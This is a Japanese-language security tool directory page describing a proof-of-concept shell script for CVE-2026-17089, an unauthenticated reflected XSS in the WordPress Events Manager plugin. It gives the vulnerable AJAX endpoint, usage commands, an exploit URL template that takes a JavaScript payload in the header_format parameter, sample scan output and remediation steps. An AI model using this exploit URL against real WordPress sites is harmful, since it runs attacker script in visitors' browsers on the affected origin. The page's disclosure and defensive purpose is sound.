Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-17089-PoC-pwnVader — CVE-2026-17089 の Shell PoC。WordPress Events Manager プラグイン (<= 7.4.0.1) における未認証の反射型 XSS であり、プラグインのフィンガープリントを行い、header_format の反射をテストします。 | Kitploit
ツール/GitHubGitHub/pwnvader/cve-2026-17089-poc-pwnvader
脆弱性スキャナーウェブ脆弱性スキャナー脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHub
pwnvader/cve-2026-17089-poc-pwnvader

CVE-2026-17089-PoC-pwnVader

CVE-2026-17089 の Shell PoC。WordPress Events Manager プラグイン (<= 7.4.0.1) における未認証の反射型 XSS であり、プラグインのフィンガープリントを行い、header_format の反射をテストします。

リポジトリを見る
10日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-17089 — Events Manager <= 7.4.0.1 — 未認証の反射型XSS (header_format)

Author: pwnVader · License: MIT (repository root)

ComponentEvents Manager – Calendar, Bookings, Tickets, and more! (WordPress plugin)
TypeCWE-79 — Reflected Cross-Site Scripting
Affected<= 7.4.0.1
Fixedlater 7.4.x release (wp_kses_post() applied in EM_Events::output_grouped())
CVECVE-2026-17089 — CVSS 3.1 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
PoCpoc.sh

概要

ショートコードのエントリポイントは header_format を wp_kses() でサニタイズしているが、未認証の AJAX アクション search_events_grouped はそのサニタイズをバイパスし、値を HTML レスポンスに エコーする (EM_Events::output_grouped())。リモートの未認証攻撃者は、影響を受けるサイトの オリジン上で任意の JavaScript を実行する URL を作成でき、それを開いた任意のユーザーに対して 攻撃が成立する (UI:R)。

使用方法

# Interactive menu
./poc.sh

# Read-only: fingerprint the plugin and test the unescaped reflection
./poc.sh check --target https://example.com

# Print the exploit URL (open it in a browser; the script runs in the target origin)
./poc.sh url --target https://example.com --payload "alert(document.domain)"

出力例 (check)

== CVE-2026-17089 PoC (check) ==
target: https://example.com

[1] Plugin fingerprint (read-only)
  [PASS] Events Manager assets are served (plugin installed)
  [info] Stable tag: 7.1.7
  [PASS] version 7.1.7 is in the affected range (<= 7.4.0.1)

[2] Unauthenticated reflection test (read-only, benign marker)
  [PASS] endpoint reflected header_format UNESCAPED (the raw  is in the response)

== RESULT: 3 PASS / 0 FAIL ==
VULNERABLE to CVE-2026-17089 (unauthenticated reflected XSS).

Exploit URL

https://example.com/wp-admin/admin-ajax.php?action=search_events_grouped&scope=all&limit=5&header_format=<urlencoded payload>

検出ロジック

  1. フィンガープリント: readme.txt (Stable tag) および/またはプラグインのアセットパス /wp-content/plugins/events-manager/includes/js/events-manager.js。
  2. 無害なマーカー (``) を admin-ajax.php?action=search_events_grouped に送信し、header_format にマーカーを設定して、 生のマークアップがレスポンスボディにエスケープされずに反射されるかどうかを確認する。

修復

  • Events Manager を最新リリースに更新する (修正ではレンダリング関数内で header_format に wp_kses_post() を適用し、すべての呼び出し元をカバーしている)。
  • 暫定措置: 未認証の search_events_grouped AJAX アクションをブロックするか、WAF/アプリケーション レベルで header_format をフィルタリングする。

参考資料

  • NVD — CVE-2026-17089: https://nvd.nist.gov/vuln/detail/CVE-2026-17089
  • GitHub Advisory: https://github.com/advisories/GHSA-gg76-jx66-hjq8

免責事項

認可されたセキュリティテスト専用。PoC は読み取り専用 (check) であるか、URL を出力する (url)。 データは変更されない。

ツールをダウンロード